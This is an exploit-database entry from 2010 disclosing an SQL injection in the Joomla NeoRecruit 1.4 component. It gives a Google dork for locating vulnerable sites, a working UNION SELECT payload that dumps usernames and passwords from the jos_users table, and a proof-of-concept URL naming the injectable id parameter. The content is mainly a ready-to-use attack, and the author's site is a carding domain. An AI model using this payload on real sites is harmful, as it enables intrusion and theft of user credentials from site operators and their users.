Joomla! Component NeoRecruit 1.4 – SQL Injection

  • 作者: v3n0m
    日期: 2010-08-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14570/
  •  ) )) ( ( ( (( ) ) 
    ( /(( /( ( ( /(( (( )\ ))\ ))\ ))\ ) )\ ) ( /(( /( 
    )\())\()))\ ))\()) )\)\ )\ (()/(()/(((()/(()/((()/( )\()) )\())
     ((_)((_)\(()/( ((_)((((_)((((_)(((_)(/(_))(_)) )\/(_))(_))/(_))(_)\|((_)\ 
    __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))_((_)_ ((_)
    \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ ||_ _|| \| | |/ / 
     \ V / (_) || (_ |\ V / / _ \| (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
    |_| \___/\___| |_| /_/ \_\\___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
    										.WEB.ID
    -----------------------------------------------------------------------
     Joomla Component com_neorecruit 1.4 (id) SQL Injection Vulnerability
    -----------------------------------------------------------------------
    Author	: v3n0m
    Site	: http://yogyacarderlink.web.id/
    Date		: August, 07-2010
    Location	: Jakarta, Indonesia
    Time Zone	: GMT +7:00
    ----------------------------------------------------------------
    
    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Application	: NeoRecruit
    Version		: 1.4 Lower versions may also be affected
    Vendor	: http://www.neojoomla.com/
    Price		: 54,90 €
    Google Dork	: inurl:com_neorecruit
    ----------------------------------------------------------------
    
    Xploit:
    ~~~~~~~
    
    -9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users--
    
    Poc:
    ~~~~~~~
    
    http://127.0.0.1/[path]/index.php?option=com_neorecruit&task=offer_view&id=[SQLi]
    
    ----------------------------------------------------------------
    
    WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com
    
    ---------------------------[EOF]--------------------------------